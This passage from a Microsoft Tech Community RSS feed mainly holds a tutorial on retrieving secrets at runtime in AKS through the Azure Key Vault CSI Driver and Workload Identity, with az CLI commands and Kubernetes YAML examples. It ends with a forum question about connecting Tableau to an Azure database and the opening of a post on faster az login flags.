&lt;LI&gt;the pipeline temporarily possesses the secret&lt;/LI&gt;
&lt;LI&gt;the rendered YAML contains the secret&lt;/LI&gt;
&lt;LI&gt;logs or artifacts may accidentally retain it&lt;/LI&gt;
&lt;LI&gt;secret rotation requires redeployment&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;This often exists because:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Key Vault secret names don't match application configuration names&lt;/LI&gt;
&lt;LI&gt;teams want backward compatibility&lt;/LI&gt;
&lt;LI&gt;changing application code is expensive&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;The Azure Key Vault CSI Driver solves this by introducing a runtime mapping layer instead of a pipeline substitution layer.&lt;/P&gt;
&lt;H2&gt;What We Wanted to Achieve&lt;/H2&gt;
&lt;P&gt;The design goals were simple:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;No secret values in YAML&lt;/LI&gt;
&lt;LI&gt;No secret substitution in CI/CD pipelines&lt;/LI&gt;
&lt;LI&gt;Runtime-only secret retrieval&lt;/LI&gt;
&lt;LI&gt;Identity-based authentication&lt;/LI&gt;
&lt;LI&gt;Support for mapping Key Vault names to application config names&lt;/LI&gt;
&lt;LI&gt;Minimal or zero application code changes&lt;/LI&gt;
&lt;LI&gt;Secure secret rotation workflows&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2&gt;Architecture Overview&lt;/H2&gt;
&lt;LI-CODE lang="mermaid"&gt;+----------------------+
|   AKS Application    |
|        Pod           |
+----------+-----------+
           |
           v
+----------------------+
| Kubernetes           |
| ServiceAccount       |
+----------+-----------+
           |
           v
+----------------------+
| AKS Workload         |
| Identity Webhook     |
+----------+-----------+
           |
           v
+----------------------+
| Federated Managed    |
| Identity             |
+----------+-----------+
           |
           v
+----------------------+
| Azure Key Vault      |
+----------+-----------+
           |
           v
+----------------------+
| CSI Driver Mount     |
| (/mnt/secrets-store) |
+----------+-----------+
           |
           v
+----------------------+
| Application Reads    |
| Secret at Runtime    |
+----------------------+
&lt;/LI-CODE&gt;
&lt;H2&gt;How the Flow Works&lt;/H2&gt;
&lt;P&gt;When a pod starts:&lt;/P&gt;
&lt;OL&gt;
&lt;LI&gt;The pod uses a Kubernetes ServiceAccount&lt;/LI&gt;
&lt;LI&gt;AKS Workload Identity injects an OIDC token&lt;/LI&gt;
&lt;LI&gt;The Secrets Store CSI Driver uses that token&lt;/LI&gt;
&lt;LI&gt;Azure validates the federated identity relationship&lt;/LI&gt;
&lt;LI&gt;The Managed Identity receives access to Key Vault&lt;/LI&gt;
&lt;LI&gt;Secrets are retrieved at runtime&lt;/LI&gt;
&lt;LI&gt;Secrets become available&lt;/LI&gt;
&lt;/OL&gt;
&lt;P&gt;This entire process happens dynamically during pod startup.&lt;/P&gt;
&lt;P&gt;No secret values pass through:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;YAML manifests&lt;/LI&gt;
&lt;LI&gt;pipeline variables&lt;/LI&gt;
&lt;LI&gt;Helm values&lt;/LI&gt;
&lt;LI&gt;release artifacts&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;The pod authenticates as itself.&lt;/P&gt;
&lt;H2&gt;Implementation Prerequisites&lt;/H2&gt;
&lt;P&gt;Before implementation, ensure:&lt;/P&gt;
&lt;P&gt;Requirement - Purpose&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;AKS Cluster - Runtime environment&lt;/LI&gt;
&lt;LI&gt;Azure Key Vault - Centralized secret store&lt;/LI&gt;
&lt;LI&gt;OIDC Enabled - Required for federation&lt;/LI&gt;
&lt;LI&gt;Workload Identity Enabled - Enables identity injection&lt;/LI&gt;
&lt;LI&gt;Managed Identity - Authentication mechanism&lt;/LI&gt;
&lt;LI&gt;Secrets Store CSI Driver - Runtime secret retrieval&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2&gt;Implementation&lt;/H2&gt;
&lt;P&gt;The implementation can generally be divided into two phases:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;Platform Setup&lt;/STRONG&gt; - One-time AKS and Azure configuration performed by platform/infrastructure teams&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Application Onboarding&lt;/STRONG&gt; - Per-service configuration performed by application teams&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;This separation is important because most of the complexity exists only once at the platform layer. After the foundational setup is complete, onboarding additional workloads becomes significantly simpler and more repeatable.&lt;/P&gt;
&lt;P&gt;The examples below are intended to demonstrate the overall implementation pattern and architecture flow. Exact implementation details may vary depending on:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;organizational RBAC models&lt;/LI&gt;
&lt;LI&gt;networking restrictions&lt;/LI&gt;
&lt;LI&gt;Key Vault access configuration&lt;/LI&gt;
&lt;LI&gt;GitOps/Helm workflows&lt;/LI&gt;
&lt;LI&gt;cluster governance policies&lt;/LI&gt;
&lt;LI&gt;AKS versions and add-on configurations&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2&gt;Phase 1 — Platform Setup&lt;/H2&gt;
&lt;H2&gt;1. Enable Required AKS Capabilities&lt;/H2&gt;
&lt;P&gt;A typical implementation starts by enabling the AKS capabilities required for identity federation and runtime secret retrieval.&lt;/P&gt;
&lt;P&gt;These usually include:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;OIDC Issuer - Enables identity federation between AKS and Microsoft Entra ID&lt;/LI&gt;
&lt;LI&gt;Workload Identity - Injects federated identity tokens into workloads&lt;/LI&gt;
&lt;LI&gt;Azure Key Vault CSI Driver - Retrieves secrets securely at runtime&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;Example Azure CLI commands:&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;az aks update \
  --resource-group &amp;lt;resource-group&amp;gt; \
  --name &amp;lt;aks-cluster&amp;gt; \
  --enable-oidc-issuer \
  --enable-workload-identity&lt;/LI-CODE&gt;&lt;LI-CODE lang="bash"&gt;az aks enable-addons \
  --addons azure-keyvault-secrets-provider \
  --resource-group &amp;lt;resource-group&amp;gt; \
  --name &amp;lt;aks-cluster&amp;gt;&lt;/LI-CODE&gt;
&lt;P&gt;Most organizations validate these capabilities before onboarding workloads.&lt;/P&gt;
&lt;H2&gt;2. Configure a Managed Identity&lt;/H2&gt;
&lt;P&gt;Each workload or application typically receives its own User-Assigned Managed Identity.&lt;/P&gt;
&lt;P&gt;This follows least-privilege principles and helps reduce operational blast radius between services.&lt;/P&gt;
&lt;P&gt;Example:&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;az identity create \
  --name workload-identity \
  --resource-group &amp;lt;resource-group&amp;gt;&lt;/LI-CODE&gt;
&lt;P&gt;The identity is then granted access to retrieve secrets from Azure Key Vault.&lt;/P&gt;
&lt;P&gt;Common approaches include:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Azure RBAC role assignments&lt;/LI&gt;
&lt;LI&gt;Azure AD group-based access&lt;/LI&gt;
&lt;LI&gt;Key Vault access policies (legacy environments)&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;Typical required permissions include:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Get&lt;/LI&gt;
&lt;LI&gt;List&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;for secrets stored in the vault.&lt;/P&gt;
&lt;H2&gt;3. Configure Federated Identity Trust&lt;/H2&gt;
&lt;P&gt;Workload Identity relies on federation between:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;AKS&lt;/LI&gt;
&lt;LI&gt;Kubernetes ServiceAccounts&lt;/LI&gt;
&lt;LI&gt;Microsoft Entra ID&lt;/LI&gt;
&lt;LI&gt;Managed Identities&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;A Federated Identity Credential establishes this trust relationship.&lt;/P&gt;
&lt;P&gt;The implementation usually maps:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;a Kubernetes namespace&lt;/LI&gt;
&lt;LI&gt;a Kubernetes ServiceAccount&lt;/LI&gt;
&lt;LI&gt;an AKS OIDC issuer&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;to a specific Managed Identity.&lt;/P&gt;
&lt;P&gt;Example structure:&lt;/P&gt;
&lt;LI-CODE lang=""&gt;system:serviceaccount:&amp;lt;namespace&amp;gt;:&amp;lt;serviceaccount&amp;gt;&lt;/LI-CODE&gt;
&lt;P&gt;This configuration is one of the most important parts of the setup because federation mismatches are a very common source of authentication failures.&lt;/P&gt;
&lt;H2&gt;4. Prepare Kubernetes Namespaces and ServiceAccounts&lt;/H2&gt;
&lt;P&gt;Application namespaces and ServiceAccounts are typically created before workload onboarding begins.&lt;/P&gt;
&lt;P&gt;The ServiceAccount acts as the identity boundary for the workload.&lt;/P&gt;
&lt;P&gt;Example:&lt;/P&gt;
&lt;LI-CODE lang="yaml"&gt;apiVersion: v1
kind: ServiceAccount
metadata:
  name: workload-sa
  namespace: application-namespace
  annotations:
    azure.workload.identity/client-id: "&amp;lt;managed-identity-client-id&amp;gt;"&lt;/LI-CODE&gt;
&lt;P&gt;This annotation links the Kubernetes ServiceAccount to the Azure Managed Identity.&lt;/P&gt;
&lt;H2&gt;Phase 2 — Application Onboarding&lt;/H2&gt;
&lt;P&gt;Once the platform capabilities are available, application onboarding becomes significantly simpler.&lt;/P&gt;
&lt;H2&gt;5. Define Secret Retrieval Using SecretProviderClass&lt;/H2&gt;
&lt;P&gt;The SecretProviderClass resource defines:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;which Key Vault secrets should be retrieved&lt;/LI&gt;
&lt;LI&gt;how those secrets should be exposed inside Kubernetes&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;Example:&lt;/P&gt;
&lt;LI-CODE lang="yaml"&gt;apiVersion: secrets-store.csi.x-k8s.io/v1
kind: SecretProviderClass
metadata:
  name: workload-kv-secrets
  namespace: application-namespace

spec:
  provider: azure

  parameters:
    usePodIdentity: "false"
    clientID: "&amp;lt;managed-identity-client-id&amp;gt;"
    keyvaultName: "&amp;lt;keyvault-name&amp;gt;"
    tenantId: "&amp;lt;tenant-id&amp;gt;"

    objects: |
      array:
        - |
          objectName: application-secret
          objectType: secret

  secretObjects:
  - secretName: workload-secret
    type: Opaque
    data:
    - key: APPLICATION_SECRET
      objectName: application-secret&lt;/LI-CODE&gt;
&lt;P&gt;A few important concepts exist here:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;objects - Defines which Key Vault secrets to retrieve&lt;/LI&gt;
&lt;LI&gt;secretObjects - Optionally syncs secrets into Kubernetes Secrets&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;This separation allows:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Key Vault secret naming&lt;/LI&gt;
&lt;LI&gt;Kubernetes secret naming&lt;/LI&gt;
&lt;LI&gt;application environment variable naming&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;to remain independent from one another.&lt;/P&gt;
&lt;P&gt;That flexibility is one of the biggest advantages of the CSI Driver approach.&lt;/P&gt;
&lt;H2&gt;6. Update Workloads to Use Workload Identity&lt;/H2&gt;
&lt;P&gt;Application deployments are then updated to:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;use the correct ServiceAccount&lt;/LI&gt;
&lt;LI&gt;enable Workload Identity&lt;/LI&gt;
&lt;LI&gt;mount the CSI volume&lt;/LI&gt;
&lt;LI&gt;optionally consume synced Kubernetes Secrets&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;Typical workload changes include:&lt;/P&gt;
&lt;H3&gt;Enable Workload Identity&lt;/H3&gt;
&lt;LI-CODE lang="yaml"&gt;labels:
  azure.workload.identity/use: "true"&lt;/LI-CODE&gt;
&lt;P&gt;Without this label:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;token injection does not occur&lt;/LI&gt;
&lt;LI&gt;workload federation fails&lt;/LI&gt;
&lt;/UL&gt;
&lt;H3&gt;Attach the ServiceAccount&lt;/H3&gt;
&lt;LI-CODE lang="yaml"&gt;serviceAccountName: workload-sa&lt;/LI-CODE&gt;
&lt;H3&gt;Mount the CSI Volume&lt;/H3&gt;
&lt;LI-CODE lang="yaml"&gt;volumes:
- name: secrets-store
  csi:
    driver: secrets-store.csi.k8s.io
    readOnly: true
    volumeAttributes:
      secretProviderClass: "workload-kv-secrets"&lt;/LI-CODE&gt;&lt;LI-CODE lang="yaml"&gt;volumeMounts:
- name: secrets-store
  mountPath: "/mnt/secrets-store"
  readOnly: true&lt;/LI-CODE&gt;
&lt;P&gt;Even if the application ultimately consumes secrets through environment variables, the CSI volume still needs to be mounted because the Kubernetes Secret synchronization occurs only after a successful mount.&lt;/P&gt;
&lt;H3&gt;Consume Secrets Inside the Application&lt;/H3&gt;
&lt;P&gt;Applications can consume secrets:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;directly as mounted files&lt;/LI&gt;
&lt;LI&gt;or through synced Kubernetes Secrets using secretKeyRef&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;Example:&lt;/P&gt;
&lt;LI-CODE lang="yaml"&gt;env:
- name: APPLICATION_SECRET
  valueFrom:
    secretKeyRef:
      name: workload-secret
      key: APPLICATION_SECRET&lt;/LI-CODE&gt;
&lt;P&gt;One of the biggest operational advantages here is that applications usually require little or no code change.&lt;/P&gt;
&lt;P&gt;The application still reads:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;environment variables&lt;/LI&gt;
&lt;LI&gt;configuration values&lt;/LI&gt;
&lt;LI&gt;mounted files&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;The underlying secret delivery mechanism changes — not the application contract.&lt;/P&gt;
&lt;H2&gt;7. Validate the Integration&lt;/H2&gt;
&lt;P&gt;Once deployed, teams typically validate:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;pod startup success&lt;/LI&gt;
&lt;LI&gt;successful CSI volume mounts&lt;/LI&gt;
&lt;LI&gt;secret retrieval from Key Vault&lt;/LI&gt;
&lt;LI&gt;environment variable injection&lt;/LI&gt;
&lt;LI&gt;workload authentication&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;Common validation activities include:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;inspecting mounted secret paths&lt;/LI&gt;
&lt;LI&gt;checking pod logs&lt;/LI&gt;
&lt;LI&gt;reviewing CSI Driver logs&lt;/LI&gt;
&lt;LI&gt;confirming Key Vault access logs&lt;/LI&gt;
&lt;LI&gt;validating Workload Identity token injection&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;Most implementation issues generally fall into one of these categories:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Federated Identity Credential mismatches&lt;/LI&gt;
&lt;LI&gt;missing workload labels&lt;/LI&gt;
&lt;LI&gt;Key Vault permission issues&lt;/LI&gt;
&lt;LI&gt;incorrect ServiceAccount mappings&lt;/LI&gt;
&lt;LI&gt;missing CSI volume mounts&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2&gt;Operational Recommendation&lt;/H2&gt;
&lt;P&gt;For production environments, many organizations also add:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;automated secret rotation handling&lt;/LI&gt;
&lt;LI&gt;restart controllers such as Stakater Reloader&lt;/LI&gt;
&lt;LI&gt;readiness probes&lt;/LI&gt;
&lt;LI&gt;rolling deployment strategies&lt;/LI&gt;
&lt;LI&gt;monitoring and alerting around secret retrieval failures&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;These additions help ensure secret updates can occur safely with minimal or zero downtime.&lt;/P&gt;
&lt;H2&gt;Understanding the YAML Components&lt;/H2&gt;
&lt;P&gt;The implementation consists of three connected resources:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;ServiceAccount - Identity binding&lt;/LI&gt;
&lt;LI&gt;SecretProviderClass - Secret retrieval definition&lt;/LI&gt;
&lt;LI&gt;Deployment - Secret consumption&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;Think of them as a chain:&lt;/P&gt;
&lt;LI-CODE lang="mermaid"&gt;ServiceAccount
   ↓
Managed Identity
   ↓
SecretProviderClass
   ↓
CSI Driver
   ↓
Deployment&lt;/LI-CODE&gt;
&lt;P&gt;If any naming mismatch exists, secret retrieval fails.&lt;/P&gt;
&lt;P&gt;Consistency matters.&lt;/P&gt;
&lt;H2&gt;Secret Rotation and Reloaders&lt;/H2&gt;
&lt;P&gt;One major operational advantage is secret rotation.&lt;/P&gt;
&lt;P&gt;Previously:&lt;/P&gt;
&lt;OL&gt;
&lt;LI&gt;Update secret&lt;/LI&gt;
&lt;LI&gt;Update pipeline variable&lt;/LI&gt;
&lt;LI&gt;Redeploy application&lt;/LI&gt;
&lt;/OL&gt;
&lt;P&gt;Now:&lt;/P&gt;
&lt;OL&gt;
&lt;LI&gt;Rotate secret in Key Vault&lt;/LI&gt;
&lt;LI&gt;CSI driver refreshes mounted content&lt;/LI&gt;
&lt;LI&gt;Application consumes updated value&lt;/LI&gt;
&lt;/OL&gt;
&lt;P&gt;For applications using environment variables:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;pod restarts are usually required&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;Many teams use:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Stakater Reloader&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;to automatically restart workloads when secrets change.&lt;/P&gt;
&lt;P&gt;Combined with:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;multiple replicas&lt;/LI&gt;
&lt;LI&gt;readiness probes&lt;/LI&gt;
&lt;LI&gt;rolling deployments&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;this enables zero-downtime secret refresh workflows.&lt;/P&gt;
&lt;H2&gt;Common Pitfalls and Troubleshooting&lt;/H2&gt;
&lt;H3&gt;Federated Credential Subject Mismatch&lt;/H3&gt;
&lt;P&gt;Most common issue.&lt;/P&gt;
&lt;P&gt;The subject must exactly match:&lt;/P&gt;
&lt;LI-CODE lang=""&gt;system:serviceaccount:&amp;lt;namespace&amp;gt;:&amp;lt;serviceaccount&amp;gt;&lt;/LI-CODE&gt;
&lt;H3&gt;Missing Workload Identity Label&lt;/H3&gt;
&lt;P&gt;This label is mandatory:&lt;/P&gt;
&lt;LI-CODE lang=""&gt;azure.workload.identity/use: "true"
&lt;/LI-CODE&gt;
&lt;P&gt;Without it:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;no token injection occurs&lt;/LI&gt;
&lt;/UL&gt;
&lt;H3&gt;Missing CSI Volume Mount&lt;/H3&gt;
&lt;P&gt;Even if using:&lt;/P&gt;
&lt;LI-CODE lang=""&gt;secretKeyRef&lt;/LI-CODE&gt;
&lt;P&gt;the CSI volume must still be mounted.&lt;/P&gt;
&lt;P&gt;Otherwise:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Kubernetes Secret sync never occurs&lt;/LI&gt;
&lt;/UL&gt;
&lt;H3&gt;Key Vault Permission Issues&lt;/H3&gt;
&lt;P&gt;Federation success does not guarantee Key Vault authorization.&lt;/P&gt;
&lt;P&gt;The Managed Identity still requires:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Get&lt;/LI&gt;
&lt;LI&gt;List&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;permissions on the vault.&lt;/P&gt;
&lt;H3&gt;Environment Variables Do Not Auto-Refresh&lt;/H3&gt;
&lt;P&gt;Secrets mounted as files can refresh dynamically depending on application behavior.&lt;/P&gt;
&lt;P&gt;Environment variables do not.&lt;/P&gt;
&lt;P&gt;If using:&lt;/P&gt;
&lt;LI-CODE lang=""&gt;secretKeyRef&lt;/LI-CODE&gt;
&lt;P&gt;consider:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Reloader controllers&lt;/LI&gt;
&lt;LI&gt;rolling restart strategies&lt;/LI&gt;
&lt;LI&gt;readiness probes&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;to safely consume rotated secrets.&lt;/P&gt;
&lt;H2&gt;Security and Operational Benefits&lt;/H2&gt;
&lt;P&gt;After migration, several improvements become immediately visible:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;No secret values in YAML&lt;/LI&gt;
&lt;LI&gt;No secret values in pipelines&lt;/LI&gt;
&lt;LI&gt;Runtime-only secret resolution&lt;/LI&gt;
&lt;LI&gt;Per-service identity isolation&lt;/LI&gt;
&lt;LI&gt;Centralized audit visibility in Azure&lt;/LI&gt;
&lt;LI&gt;Easier secret rotation&lt;/LI&gt;
&lt;LI&gt;Reduced operational blast radius&lt;/LI&gt;
&lt;LI&gt;Cleaner DevSecOps posture&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;Most importantly:&lt;/P&gt;
&lt;P&gt;The deployment pipeline stops being part of the secret distribution mechanism.&lt;/P&gt;
&lt;H2&gt;Key Takeaways&lt;/H2&gt;
&lt;UL&gt;
&lt;LI&gt;Secrets should never flow through deployment pipelines&lt;/LI&gt;
&lt;LI&gt;Workload Identity removes the need for static credentials&lt;/LI&gt;
&lt;LI&gt;CSI Driver enables runtime secret retrieval directly from Key Vault&lt;/LI&gt;
&lt;LI&gt;SecretProviderClass allows clean secret name mapping&lt;/LI&gt;
&lt;LI&gt;File-based secret consumption is more secure than environment variables&lt;/LI&gt;
&lt;LI&gt;Secret rotation becomes operationally simpler and safer&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2&gt;Microsoft Documentation References&lt;/H2&gt;
&lt;P&gt;Official Microsoft guidance:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;AKS Workload Identity &lt;A href="https://learn.microsoft.com/azure/aks/workload-identity-overview" target="_blank"&gt;https://learn.microsoft.com/azure/aks/workload-identity-overview&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;Azure Key Vault Provider for Secrets Store CSI Driver &lt;A href="https://learn.microsoft.com/azure/aks/csi-secrets-store-driver" target="_blank"&gt;https://learn.microsoft.com/azure/aks/csi-secrets-store-driver&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;Secrets Store CSI Driver &lt;A href="https://secrets-store-csi-driver.sigs.k8s.io/" target="_blank"&gt;https://secrets-store-csi-driver.sigs.k8s.io/&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;Federated Identity Credentials &lt;A href="https://learn.microsoft.com/entra/workload-id/workload-identity-federation" target="_blank"&gt;https://learn.microsoft.com/entra/workload-id/workload-identity-federation&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;These references are extremely useful when troubleshooting federation, RBAC, or CSI mounting issues.&lt;/P&gt;
&lt;H2&gt;Final Thoughts&lt;/H2&gt;
&lt;P&gt;The Azure Key Vault CSI Driver + Workload Identity pattern fundamentally changes how secrets flow through AKS environments.&lt;/P&gt;
&lt;P&gt;Instead of distributing secrets through:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;YAML&lt;/LI&gt;
&lt;LI&gt;CI/CD systems&lt;/LI&gt;
&lt;LI&gt;deployment artifacts&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;secrets remain protected behind:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;identities&lt;/LI&gt;
&lt;LI&gt;runtime authorization&lt;/LI&gt;
&lt;LI&gt;centralized access control&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;The initial setup is slightly more involved than pipeline substitution, but once the platform foundations are established, onboarding additional workloads becomes lightweight and repeatable.&lt;/P&gt;
&lt;P&gt;This is one of the highest-leverage security improvements available for Kubernetes platforms because it removes an entire category of secret exposure risk without requiring major application rewrites.&lt;/P&gt;
&lt;P&gt;Secrets belong to identities — not deployment manifests.&lt;/P&gt;
&lt;P&gt;#Azure #AKS #Kubernetes #DevSecOps #CloudSecurity #KeyVault #WorkloadIdentity #PlatformEngineering&lt;/P&gt;</description>
      <pubDate>Mon, 08 Jun 2026 07:00:00 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/microsoft-developer-community/getting-secrets-out-of-yaml-implementing-azure-key-vault-csi/ba-p/4522590</guid>
      <dc:creator>anandranjan</dc:creator>
      <dc:date>2026-06-08T07:00:00Z</dc:date>
    </item>
    <item>
      <title>Integrating Tableau to a Azure Internal Database</title>
      <link>https://techcommunity.microsoft.com/t5/azure/integrating-tableau-to-a-azure-internal-database/m-p/4526203#M22566</link>
      <description>&lt;P&gt;Hi everyone, I wanted to ask if it's possible if I can connect Tableau to an internal database that I'm planning to build. Not just Tableau but Monday.com too. And yeah, I know I need to build the database first, and sort everything out first, but it's for my presentation. I would really be grateful if someone can answer this and show me a bit of how I can do that. Do I need some token from tableau or something?&amp;nbsp;&lt;/P&gt;</description>
      <pubDate>Mon, 08 Jun 2026 04:57:55 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/azure/integrating-tableau-to-a-azure-internal-database/m-p/4526203#M22566</guid>
      <dc:creator>sharmerika</dc:creator>
      <dc:date>2026-06-08T04:57:55Z</dc:date>
    </item>
    <item>
      <title>Faster az login: introducing --skip-subscription-discovery and targeted --subscription</title>
      <link>https://techcommunity.microsoft.com/t5/azure-tools-blog/faster-az-login-introducing-skip-subscription-discovery-and/ba-p/4526116</link>
      <description>&lt;P data-line="2"&gt;&lt;STRONG&gt;TL;DR&lt;/STRONG&gt;&amp;nbsp;— If you belong to&amp;nbsp;&lt;STRONG&gt;many tenants&lt;/STRONG&gt;, or a tenant holds&amp;nbsp;&lt;STRONG&gt;hundreds or thousands of subscriptions&lt;/STRONG&gt;,&amp;nbsp;az login&amp;nbsp;can crawl — it tries to enumerate&amp;nbsp;&lt;EM&gt;every&lt;/EM&gt;&amp;nbsp;subscription in&amp;nbsp;&lt;EM&gt;every&lt;/EM&gt;&amp;nbsp;tenant before it returns. Two flags now let you skip that enumeration and make login near-instant:&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;az login --tenant &amp;lt;TENANT_ID&amp;gt; --skip-subscription-discovery&lt;/P&gt;
&lt;P&gt;az login --subscription &amp;lt;SUB_ID_OR_NAME&amp;gt;&lt;/P&gt;
&lt;P&gt;az login --tenant &amp;lt;TENANT_ID&amp;gt; --subscription &amp;lt;SUB_ID_OR_NAME&amp;gt; --skip-subscription-discovery&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;P data-line="10"&gt;&lt;STRONG&gt;Available in Azure CLI 2.86.0 and later.&lt;/STRONG&gt;&amp;nbsp;Both&amp;nbsp;--skip-subscription-discovery&amp;nbsp;(and its&amp;nbsp;--skip-sub&amp;nbsp;alias) ship in&amp;nbsp;&lt;STRONG&gt;az CLI v2.86.0&lt;/STRONG&gt;. Run&amp;nbsp;az version&amp;nbsp;to check, and&amp;nbsp;az upgrade&amp;nbsp;if you're on an older build.&lt;/P&gt;
&lt;P data-line="12"&gt;&lt;STRONG&gt;Note:&lt;/STRONG&gt; --skip-subscription-discovery&amp;nbsp;requires&amp;nbsp;--tenant. Because you're skipping the tenant/subscription enumeration, the CLI can't infer which tenant to sign in to, so you must name it explicitly. Running&amp;nbsp;az login --skip-subscription-discovery&amp;nbsp;on its own fails with&amp;nbsp;usage error: '--skip-subscription-discovery' requires '--tenant'.&lt;/P&gt;
&lt;P data-line="12"&gt;&amp;nbsp;&lt;/P&gt;
&lt;H2 data-line="14"&gt;The problem: login enumerates every subscription in every tenant&lt;/H2&gt;
&lt;P data-line="18"&gt;This post is about&amp;nbsp;&lt;STRONG&gt;one specific pain point&lt;/STRONG&gt;: what happens when you have&amp;nbsp;&lt;STRONG&gt;a large number of tenants, and tenants that each contain hundreds or thousands of subscriptions&lt;/STRONG&gt;.&lt;/P&gt;
&lt;P data-line="20"&gt;When you run&amp;nbsp;az login, the CLI doesn't just authenticate you. After auth, it&amp;nbsp;&lt;STRONG&gt;walks every tenant you can access and calls ARM to list every subscription in each one&lt;/STRONG&gt;, then caches the full catalog locally. The cost of that step scales with&amp;nbsp;&lt;STRONG&gt;(number of tenants) × (subscriptions per tenant)&lt;/STRONG&gt;&amp;nbsp;— so it's roughly invisible for a developer with one tenant and a couple of subscriptions, but it falls off a cliff at enterprise scale:&lt;/P&gt;
&lt;UL data-line="22"&gt;
&lt;LI data-line="22"&gt;A user who is a member or guest of&amp;nbsp;&lt;STRONG&gt;dozens of tenants&lt;/STRONG&gt;&amp;nbsp;pays a separate ARM round trip&amp;nbsp;&lt;EM&gt;per tenant&lt;/EM&gt;.&lt;/LI&gt;
&lt;LI data-line="23"&gt;A single tenant with&amp;nbsp;&lt;STRONG&gt;hundreds or thousands of subscriptions&lt;/STRONG&gt;&amp;nbsp;means one giant (often paged) enumeration just to build a list you may never look at.&lt;/LI&gt;
&lt;LI data-line="24"&gt;Put both together — many tenants, each dense with subscriptions — and the enumeration dominates everything. The interactive sign-in is fast; the&amp;nbsp;&lt;STRONG&gt;post-auth subscription discovery&lt;/STRONG&gt;&amp;nbsp;is what makes you wait.&lt;/LI&gt;
&lt;/UL&gt;
&lt;P data-line="26"&gt;In these high-scale tenant/subscription topologies,&amp;nbsp;az login&amp;nbsp;taking&amp;nbsp;&lt;STRONG&gt;30 seconds to several minutes&lt;/STRONG&gt;&amp;nbsp;is common — and almost all of that time is the discovery walk, not authentication. That is exactly the cost these flags remove.&lt;/P&gt;
&lt;P data-line="28"&gt;Other situations (CI/CD pinned to one known subscription, conditional-access tenants, etc.) benefit too, but they're secondary. The flags exist first and foremost to rescue the&amp;nbsp;&lt;STRONG&gt;many-tenants / many-subscriptions&lt;/STRONG&gt; case.&lt;/P&gt;
&lt;P data-line="28"&gt;&amp;nbsp;&lt;/P&gt;
